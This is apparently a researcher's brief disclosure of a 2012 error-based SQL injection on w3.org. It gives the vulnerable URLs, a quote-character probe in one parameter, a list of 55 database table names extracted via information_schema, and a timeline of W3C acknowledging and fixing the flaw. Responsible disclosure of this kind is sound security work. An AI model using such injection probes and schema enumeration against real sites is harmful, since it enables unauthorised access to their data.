Created
April 29, 2014 12:34
W3C SQL Injection (10/2012)
W3C.org was vulnerable to error-based SQL injection:
http://www.w3.org/WAI/GL/WCAG20/issue-tracking/viewdata_individual.php?id=1
http://www.w3.org/WAI/GL/WCAG20/issue-tracking/resolutions/no_response_results.php?frum=%22
select table_name from information_schema.tables [55]:
[*] AC200011FollowUp
[*] acmfastsurvey
[*] ACSurvey200210
[*] CHARACTER_SETS
[*] COLLATION_CHARACTER_SET_APPLICABILITY
[*] COLLATIONS
[*] COLUMN_PRIVILEGES
[*] COLUMNS
[*] commentsTracker
[*] cookies
[*] dog
[*] ENGINES
[*] EVENTS
[*] FILES
[*] GLOBAL_STATUS
[*] GLOBAL_VARIABLES
[*] human
[*] KEY_COLUMN_USAGE
[*] messages
[*] PARTITIONS
[*] PLUGINS
[*] PROCESSLIST
[*] PROFILING
[*] prospective_members
[*] REFERENTIAL_CONSTRAINTS
[*] resource
[*] resources
[*] reviewedSpecifications
[*] ROUTINES
[*] SCHEMA_PRIVILEGES
[*] SCHEMATA
[*] SESSION_STATUS
[*] SESSION_VARIABLES
[*] specSections
[*] STATISTICS
[*] TABLE_CONSTRAINTS
[*] TABLE_PRIVILEGES
[*] TABLES
[*] testac
[*] testad
[*] testae
[*] toy
[*] toy2
[*] toy3
[*] TRIGGERS
[*] triples
[*] trrdf_id2val
[*] trrdf_store_var
[*] trrdf_triple
[*] trrdf_triple_dup
[*] uri
[*] USER_PRIVILEGES
[*] VIEWS
[*] wgOptions
[*] xpointerRegistry
Timeline:
15/10/2012 Initial report
15/10/2012 Acknowledged by W3C
26/10/2012 Bugs still unfixed, asked again for status
27/10/2012 Got feedback from W3C:
    "Thanks very much for bringing this to our attention, and for
    following up. Many of my colleagues are traveling this week but I
    expect we will be able to get these fixed sometime within the
    next few days."
Didn't know exactly when they fixed these issues.